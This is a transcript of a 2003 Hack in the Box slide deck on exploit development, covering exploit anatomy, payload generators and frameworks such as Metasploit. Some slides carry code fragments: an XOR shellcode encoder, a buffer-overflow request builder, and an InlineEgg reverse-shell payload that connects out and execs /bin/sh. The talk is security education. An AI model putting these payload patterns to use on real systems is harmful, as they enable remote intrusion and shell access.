Advanced Exploit Development
-
Upload
pooja-khare -
Category
Documents
-
view
155 -
download
3
Transcript of Advanced Exploit Development
![Page 1: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/1.jpg)
1
Hack in the Box 2003
AdvancedExploit Development
Trends and Tools
H D Moore
![Page 2: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/2.jpg)
2
Who
Who am I?
Co-founder of Digital Defense
Security researcher (5+ years)
Projects
DigitalOffense.net
Metasploit.com
![Page 3: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/3.jpg)
3
What
What is this about?
1. Exploit Trends
2. Anatomy of an Exploit
3. Common Exploit Problems
4. Payload Generators
5. Exploit Frameworks
6. Metasploit v2.0 Demo!
![Page 4: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/4.jpg)
4
Why
Why should you see this?
Exploit basics and challenges
Recent trends and advances
New shellcode generation tools
Review of exploit frameworks
Exclusive look at Metasploit v2.0
![Page 5: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/5.jpg)
5
Hack in the Box 2003
Exploit Trends
![Page 6: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/6.jpg)
6
#1: Exploit Trends
More Exploit Writers
Information reached critical mass
Huge exploit devel community
Improved Techniques
No more local brute force
4 Bytes: GOT, SEH, PEB
![Page 7: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/7.jpg)
7
#1: Exploit Trends
Reliable Exploit Code
Universal win32 addresses
Allocation control techniques
Where Does This Lead?
Shrinking exploit timeline
Exploit tools and frameworks
![Page 8: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/8.jpg)
8
Hack in the Box 2003
Anatomy of an Exploit
![Page 9: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/9.jpg)
9
#2: Anatomy of an Exploit
Exploit Components
Target and option selection
Network and protocol code
Payload or “shellcode”
Payload encoding routine
Exploit request builder
Payload handler routine
![Page 10: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/10.jpg)
10
#2: Anatomy of an Exploit
Target and option selection
List of addresses and offsets
Process user selected target
Process other exploit options
This adds up to a lot of code...
![Page 11: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/11.jpg)
11
#2: Anatomy of an Exploit
Process Options
Target SystemIP: 1.2.3.4OS: Linux
./exp -h 1.2.3.4 -p 21 -t 0
Parsing command options...
![Page 12: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/12.jpg)
12
#2: Anatomy of an Exploit
Network and protocol code
Resolve the target address
Create the appropriate socket
Connect the socket if needed
Perform any error handling
Start protocol negotiation
![Page 13: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/13.jpg)
13
#2: Anatomy of an Exploit
Process Options
Target SystemIP: 1.2.3.4OS: Linux
gethostbyname(sockaddr)socket(AF_INET, ...);connect(s, &sockaddr, 16)ftp_login(s, user, pass);
Connecting to target...Network Conn
![Page 14: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/14.jpg)
14
#2: Anatomy of an Exploit
Payload or “shellcode”
Executes when exploit works
Bindshell, Findsock, Adduser
Normally written in assembly
Stored in code as binary string
Configuration done via offsets
![Page 15: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/15.jpg)
15
#2: Anatomy of an Exploit
Process Options
Target SystemIP: 1.2.3.4OS: Linux
shellcodes[0] = “\xeb...”scode = shellcodes[target]scode[PORT] = htons(...)
Setting target...Network Conn
Payload
![Page 16: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/16.jpg)
16
#2: Anatomy of an Exploit
Payload encoding routine
Most exploits restrict characters
Encoder must filter these chars
Standard type is XOR decode
Often just pre-encode payload
Payload options also encoded
![Page 17: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/17.jpg)
17
#2: Anatomy of an Exploit
Process Options
Target SystemIP: 1.2.3.4OS: Linux
for(x=0;x<sizeof(scode);x++)scode[x]^= 0x99;
Encoding shellcode...Network Conn
Payload
Payload Encoder
![Page 18: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/18.jpg)
18
#2: Anatomy of an Exploit
Exploit request builder
Code which triggers the vuln
Ranges from simple to complex
Can require various calculations
Normally just string mangling
Scripting languages excel at this
![Page 19: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/19.jpg)
19
#2: Anatomy of an Exploit
Process Options
Target SystemIP: 1.2.3.4OS: Linux
buf= web_request(“/cgi-bin...memcpy(buf+100, scode, ...);buf[480] = (char *) retaddr;send(s, buf, strlen(buf));
Sending exploit request...
Network Conn
Payload
Payload Encoder
Exploit Request
Payload
![Page 20: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/20.jpg)
20
#2: Anatomy of an Exploit
Payload handler routine
Each payload needs a handler
Often just connects to bindshell
Reverse connect needs listener
Connects console to socket
Account for large chunk of code
![Page 21: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/21.jpg)
21
#2: Anatomy of an Exploit
Process Options
Target SystemIP: 1.2.3.4OS: Linux
b = socket(AF_INET, ...);connect(b, &sockaddr, 16);handle_shell(b)
Dropping to shell...sh-2.04# iduid=0(root) gid=0(root)...
Network Conn
Payload
Payload Encoder
Exploit Request
Payload Handler Bind ShellPayload
![Page 22: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/22.jpg)
22
Hack in the Box 2003
Common Exploit Problems
![Page 23: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/23.jpg)
23
#3: Common Exploit Problems
Exploit code is rushed
Robust code takes time
Coders race to be the first
Old exploits are less useful
Result: lots of broken code
![Page 24: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/24.jpg)
24
#3: Common Exploit Problems
Exploiting Complex Protocols
RPC, SSH, SSL, SMB
Exploit depends on API
Exploit supplied as patch
Restricts exploit environment
Requires old software archive
![Page 25: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/25.jpg)
25
#3: Common Exploit Problems
Limited Target Sets
One-shot vulnerabilities suck
Always limited testing resources
Finding target values takes time
![Page 26: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/26.jpg)
26
#3: Common Exploit Problems
Payload Issues
Most hardcode payloads
Firewalls can block bind shells
Custom config breaks exploit
No standard payload library
![Page 27: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/27.jpg)
27
Hack in the Box 2003
Payload Generators
![Page 28: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/28.jpg)
28
#4: Payload Generators
Generator Basics
Dynamic payload creation
Use a high-level language
Useful for custom situations
![Page 29: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/29.jpg)
29
#4: Payload Generators
Many Generator Projects
Only a few are usable
Spawned from frameworks
Impressive capabilities so far
![Page 30: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/30.jpg)
30
#4: Payload Generators
Impurity (Alexander Cuttergo)
Shellcode downloads to memory
Executable is staticly linked C
Allows library functions
No filesystem access required
Supports Linux on x86
![Page 31: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/31.jpg)
31
#4: Payload Generators
![Page 32: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/32.jpg)
32
#4: Payload Generators
Shellforge (Philippe Biondi )
Transforms C to payload
Uses GCC and python
Includes helper API
Simple and usable
![Page 33: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/33.jpg)
33
#4: Payload Generators
Shellforge Example:
#include "include/sfsyscall.h"
int main(void) { char buf[] = "Hello world!\n"; write(1, buf, sizeof(buf));
exit(0);}
![Page 34: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/34.jpg)
34
#4: Payload Generators
MOSDEF (Immunity Inc)
GPL spawn of CANVAS
Dynamic code via python
API loader via “import” tags
Compile, send, exec, return
Version 0.1 not ready to use
![Page 35: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/35.jpg)
35
#4: Payload Generators
MOSDEF Example:#import "remote","Kernel32._lcreat" as "_lcreat"#import "string","filename" as "filename
//start of codevoid main() { int i; i=_lcreat(filename); sendint(i,i);}
![Page 36: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/36.jpg)
36
#4: Payload Generators
InlineEgg (CORE SDI)
Spawn of CORE Impact
Dynamic code via python
Non-commercial use only
Supports Linux, BSD, Windows...
![Page 37: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/37.jpg)
37
#4: Payload Generators
InlineEgg Example: egg = InlineEgg(Linuxx86Syscall)
# connect to other side sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM) sock = egg.save(sock) egg.connect(sock,(connect_addr, connect_port))
# dup and exec egg.dup2(sock, 0) egg.dup2(sock, 1) egg.dup2(sock, 2) egg.execve('/bin/sh',('bash','-i'))
![Page 38: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/38.jpg)
38
Hack in the Box 2003
Exploit Frameworks
![Page 39: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/39.jpg)
39
#5: Exploit Frameworks
Framework Basics
Library of common routines
Simple to add new payloads
Minimize development time
Platform for new techniques
![Page 40: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/40.jpg)
40
#5: Exploit Frameworks
Public Exploit Frameworks
Two stable commercial products
Handful of open source projects
New projects in stealth mode
![Page 41: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/41.jpg)
41
#5: Exploit Frameworks
CORE Impact (CORE SDI)
Strong product, 2+ years old
Skilled development team
Massive number of exploits
Python and C++ (Windows)
Starts at $15,000 USD
![Page 42: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/42.jpg)
42
#5: Exploit Frameworks
CORE Impact (CORE SDI)
Stable syscall proxy system
Full development platform
Discovery and probe modules
Macro function capabilities
Integrated XML reporting
![Page 43: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/43.jpg)
43
#5: Exploit Frameworks
![Page 44: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/44.jpg)
44
#5: Exploit Frameworks
Windows ASM Components
Solid design, great features
Includes skeleton and manager
Full source code is available
Written in C and ASM
Modular development system
![Page 45: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/45.jpg)
45
#5: Exploit Frameworks
Windows ASM Components
Small first stage component
Installs payload over network
Avoid bytes with XOR encoder
Fork, Bind, Connect, Findsock
![Page 46: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/46.jpg)
46
#5: Exploit Frameworks
![Page 47: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/47.jpg)
47
#5: Exploit Frameworks
CANVAS (Immunity Inc)
New and gaining ground
Small set of reliable exploits
Includes non-public “0-day”
Supports Linux & Windows
Priced at $995 USD
![Page 48: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/48.jpg)
48
#5: Exploit Frameworks
CANVAS (Immunity Inc)
Working syscall proxy system
Solid payload encoder system
Includes API for developers
Exploits Solaris, Linux, Windoze
Automatic SQL injection module
![Page 49: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/49.jpg)
49
#5: Exploit Frameworks
![Page 50: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/50.jpg)
50
#5: Exploit Frameworks
LibExploit (Simon Femerling)
New project, improving quickly
C library to simply development
Includes two sample exploits
Currently supports Linux x86
Released as open source (GPL)
![Page 51: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/51.jpg)
51
#5: Exploit Frameworks
LibExploit (Simon Femerling)
Includes ~30 stock payloads
Generate dynamic payloads
Can encode with ADMutate
Common networking API
Built-in exploit console
![Page 52: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/52.jpg)
52
#5: Exploit Frameworks
![Page 53: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/53.jpg)
53
#5: Exploit Frameworks
Metasploit Exploit Framework
Complete exploit environment
Small set of reliable exploits
Trivial to use new payloads
Handlers and callbacks
Full source code (OSS)
![Page 54: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/54.jpg)
54
#5: Exploit Frameworks
Metasploit Exploit Framework
Modular and extensible API
Protocol modules and routines
Easy to add new interfaces
Designed to allow embedding
Very active development
![Page 55: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/55.jpg)
55
#5: Exploit Frameworks
![Page 56: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/56.jpg)
56
Hack in the Box 2003
Questions?
![Page 57: Advanced Exploit Development](https://reader031.fdocuments.net/reader031/viewer/2022020714/54fc13524a795937538b4c6c/html5/thumbnails/57.jpg)
57
Hack in the Box 2003
Metasploit FrameworkDemonstration